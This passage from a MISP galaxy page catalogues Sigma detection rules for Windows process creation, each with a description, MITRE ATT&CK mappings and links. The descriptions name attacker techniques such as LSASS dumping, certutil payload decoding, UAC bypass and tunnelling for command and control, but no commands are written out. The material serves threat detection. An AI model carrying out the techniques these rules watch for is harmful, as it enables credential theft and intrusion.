Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine

The tag is: misp-galaxy:sigma-rules="Potential Reconnaissance Activity Via GatherNetworkInfo.VBS"

Potential Reconnaissance Activity Via GatherNetworkInfo.VBS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 10685. Table References

Links

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml

Potential PowerShell Execution Policy Tampering - ProcCreation

Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Execution Policy Tampering - ProcCreation"

Table 10686. Table References

Links

https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml

Renamed Sysinternals Sdelete Execution

Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn’t do (the renaming)

The tag is: misp-galaxy:sigma-rules="Renamed Sysinternals Sdelete Execution"

Renamed Sysinternals Sdelete Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 10687. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml

Shell Process Spawned by Java.EXE

Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)

The tag is: misp-galaxy:sigma-rules="Shell Process Spawned by Java.EXE"

Table 10688. Table References

Links

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml

Permission Misconfiguration Reconnaissance Via Findstr.EXE

Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions

The tag is: misp-galaxy:sigma-rules="Permission Misconfiguration Reconnaissance Via Findstr.EXE"

Permission Misconfiguration Reconnaissance Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10689. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml

Cloudflared Tunnel Execution

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

The tag is: misp-galaxy:sigma-rules="Cloudflared Tunnel Execution"

Cloudflared Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10690. Table References

Links

https://github.com/cloudflare/cloudflared

https://blog.reconinfosec.com/emergence-of-akira-ransomware-group

https://developers.cloudflare.com/cloudflare-one/connections/connect-apps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml

File Decoded From Base64/Hex Via Certutil.EXE

Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution

The tag is: misp-galaxy:sigma-rules="File Decoded From Base64/Hex Via Certutil.EXE"

File Decoded From Base64/Hex Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10691. Table References

Links

https://twitter.com/JohnLaTwC/status/835149808817991680

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/

https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml

Suspicious Child Process Created as System

Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Created as System"

Suspicious Child Process Created as System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 10692. Table References

Links

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://twitter.com/Cyb3rWard0g/status/1453123054243024897

https://github.com/antonioCoco/RogueWinRM

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml

AADInternals PowerShell Cmdlets Execution - ProccessCreation

Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.

The tag is: misp-galaxy:sigma-rules="AADInternals PowerShell Cmdlets Execution - ProccessCreation"

Table 10693. Table References

Links

https://o365blog.com/aadinternals/

https://github.com/Gerenios/AADInternals

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml

Suspicious TSCON Start as SYSTEM

Detects a tscon.exe start as LOCAL SYSTEM

The tag is: misp-galaxy:sigma-rules="Suspicious TSCON Start as SYSTEM"

Suspicious TSCON Start as SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10694. Table References

Links

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml

Process Memory Dump Via Dotnet-Dump

Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS

The tag is: misp-galaxy:sigma-rules="Process Memory Dump Via Dotnet-Dump"

Process Memory Dump Via Dotnet-Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10695. Table References

Links

https://twitter.com/bohops/status/1635288066909966338

https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet_dump.yml

Potential Discovery Activity Via Dnscmd.EXE

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.

The tag is: misp-galaxy:sigma-rules="Potential Discovery Activity Via Dnscmd.EXE"

Potential Discovery Activity Via Dnscmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10696. Table References

Links

https://docs.microsoft.com/en-us/azure/dns/dns-zones-records

https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml

Suspicious Dump64.exe Execution

Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder

The tag is: misp-galaxy:sigma-rules="Suspicious Dump64.exe Execution"

Suspicious Dump64.exe Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10697. Table References

Links

https://twitter.com/mrd0x/status/1460597833917251595

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml

Suspicious Cmdl32 Execution

lolbas Cmdl32 is use to download a payload to evade antivirus

The tag is: misp-galaxy:sigma-rules="Suspicious Cmdl32 Execution"

Suspicious Cmdl32 Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10698. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/

https://twitter.com/SwiftOnSecurity/status/1455897435063074824

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml

PUA - CsExec Execution

Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative

The tag is: misp-galaxy:sigma-rules="PUA - CsExec Execution"

PUA - CsExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10699. Table References

Links

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://github.com/malcomvetter/CSExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_csexec.yml

Windows Credential Manager Access via VaultCmd

List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe

The tag is: misp-galaxy:sigma-rules="Windows Credential Manager Access via VaultCmd"

Windows Credential Manager Access via VaultCmd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10700. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml

Suspicious Child Process Of SQL Server

Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of SQL Server"

Suspicious Child Process Of SQL Server has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10701. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml

Remote Access Tool - ScreenConnect Server Web Shell Execution

Detects potential web shell execution from the ScreenConnect server process.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Server Web Shell Execution"

Remote Access Tool - ScreenConnect Server Web Shell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10702. Table References

Links

https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8

https://blackpointcyber.com/resources/blog/breaking-through-the-screen/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml

WSL Child Process Anomaly

Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL

The tag is: misp-galaxy:sigma-rules="WSL Child Process Anomaly"

WSL Child Process Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10703. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/

https://twitter.com/nas_bench/status/1535431474429808642

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml

Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file

The tag is: misp-galaxy:sigma-rules="Mstsc.EXE Execution With Local RDP File"

Mstsc.EXE Execution With Local RDP File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10704. Table References

Links

https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/

https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml

HackTool - SILENTTRINITY Stager Execution

Detects SILENTTRINITY stager use via PE metadata

The tag is: misp-galaxy:sigma-rules="HackTool - SILENTTRINITY Stager Execution"

HackTool - SILENTTRINITY Stager Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 10705. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml

Computer System Reconnaissance Via Wmic.EXE

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

The tag is: misp-galaxy:sigma-rules="Computer System Reconnaissance Via Wmic.EXE"

Computer System Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10706. Table References

Links

https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml

Always Install Elevated Windows Installer

Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege

The tag is: misp-galaxy:sigma-rules="Always Install Elevated Windows Installer"

Always Install Elevated Windows Installer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10707. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml

File Download From Browser Process Via Inline URL

Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

The tag is: misp-galaxy:sigma-rules="File Download From Browser Process Via Inline URL"

File Download From Browser Process Via Inline URL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10708. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msedge/

https://twitter.com/mrd0x/status/1478116126005641220

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml

Add Potential Suspicious New Download Source To Winget

Detects usage of winget to add new potentially suspicious download sources

The tag is: misp-galaxy:sigma-rules="Add Potential Suspicious New Download Source To Winget"

Add Potential Suspicious New Download Source To Winget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10709. Table References

Links

https://learn.microsoft.com/en-us/windows/package-manager/winget/source

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml

Suspicious Atbroker Execution

Atbroker executing non-deafualt Assistive Technology applications

The tag is: misp-galaxy:sigma-rules="Suspicious Atbroker Execution"

Suspicious Atbroker Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10710. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Atbroker/

http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml

DLL Execution via Rasautou.exe

Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.

The tag is: misp-galaxy:sigma-rules="DLL Execution via Rasautou.exe"

DLL Execution via Rasautou.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10711. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html

https://github.com/fireeye/DueDLLigence

https://lolbas-project.github.io/lolbas/Binaries/Rasautou/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml

Enumeration for Credentials in Registry

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services

The tag is: misp-galaxy:sigma-rules="Enumeration for Credentials in Registry"

Enumeration for Credentials in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 10712. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml

Suspicious VBoxDrvInst.exe Parameters

Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys

The tag is: misp-galaxy:sigma-rules="Suspicious VBoxDrvInst.exe Parameters"

Suspicious VBoxDrvInst.exe Parameters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10713. Table References

Links

https://twitter.com/pabraeken/status/993497996179492864

https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml

Base64 MZ Header In CommandLine

Detects encoded base64 MZ header in the commandline

The tag is: misp-galaxy:sigma-rules="Base64 MZ Header In CommandLine"

Table 10714. Table References

Links

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml

Suspicious File Download From IP Via Wget.EXE

Detects potentially suspicious file downloads directly from IP addresses using Wget.exe

The tag is: misp-galaxy:sigma-rules="Suspicious File Download From IP Via Wget.EXE"

Table 10715. Table References

Links

https://www.gnu.org/software/wget/manual/wget.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml

Scheduled Task Creation Via Schtasks.EXE

Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.

The tag is: misp-galaxy:sigma-rules="Scheduled Task Creation Via Schtasks.EXE"

Scheduled Task Creation Via Schtasks.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10716. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml

HackTool - SharpMove Tool Execution

Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.

The tag is: misp-galaxy:sigma-rules="HackTool - SharpMove Tool Execution"

HackTool - SharpMove Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10717. Table References

Links

https://github.com/0xthirteen/SharpMove/

https://pentestlab.blog/tag/sharpmove/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml

Suspicious Serv-U Process Pattern

Detects a suspicious process pattern which could be a sign of an exploited Serv-U service

The tag is: misp-galaxy:sigma-rules="Suspicious Serv-U Process Pattern"

Suspicious Serv-U Process Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 10718. Table References

Links

https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml

Suspicious Where Execution

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

The tag is: misp-galaxy:sigma-rules="Suspicious Where Execution"

Suspicious Where Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 10719. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml

Whoami Utility Execution

Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation

The tag is: misp-galaxy:sigma-rules="Whoami Utility Execution"

Whoami Utility Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10720. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution.yml

HackTool - WinPwn Execution

Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

The tag is: misp-galaxy:sigma-rules="HackTool - WinPwn Execution"

HackTool - WinPwn Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 10721. Table References

Links

https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841

https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md

https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/

https://github.com/S3cur3Th1sSh1t/WinPwn

repo[0]=redcanaryco/atomic-red-team[repo[0]=redcanaryco/atomic-red-team]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml

Potential NTLM Coercion Via Certutil.EXE

Detects possible NTLM coercion via certutil using the 'syncwithWU' flag

The tag is: misp-galaxy:sigma-rules="Potential NTLM Coercion Via Certutil.EXE"

Potential NTLM Coercion Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10722. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/issues/243

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml

Visual Studio Code Tunnel Execution

Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Execution"

Visual Studio Code Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10723. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml

Sdclt Child Processes

A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.

The tag is: misp-galaxy:sigma-rules="Sdclt Child Processes"

Sdclt Child Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10724. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md

https://github.com/OTRF/detection-hackathon-apt29/issues/6

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml

Windows Binary Executed From WSL

Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

The tag is: misp-galaxy:sigma-rules="Windows Binary Executed From WSL"

Windows Binary Executed From WSL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10725. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml

HackTool - Wmiexec Default Powershell Command

Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script

The tag is: misp-galaxy:sigma-rules="HackTool - Wmiexec Default Powershell Command"

Table 10726. Table References

Links

https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml

Potential SquiblyTwo Technique Execution

Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields

The tag is: misp-galaxy:sigma-rules="Potential SquiblyTwo Technique Execution"

Potential SquiblyTwo Technique Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10727. Table References

Links

https://twitter.com/mattifestation/status/986280382042595328

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

https://atomicredteam.io/defense-evasion/T1220/

https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml

Forfiles Command Execution

Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.

The tag is: misp-galaxy:sigma-rules="Forfiles Command Execution"

Forfiles Command Execution has relationships with:

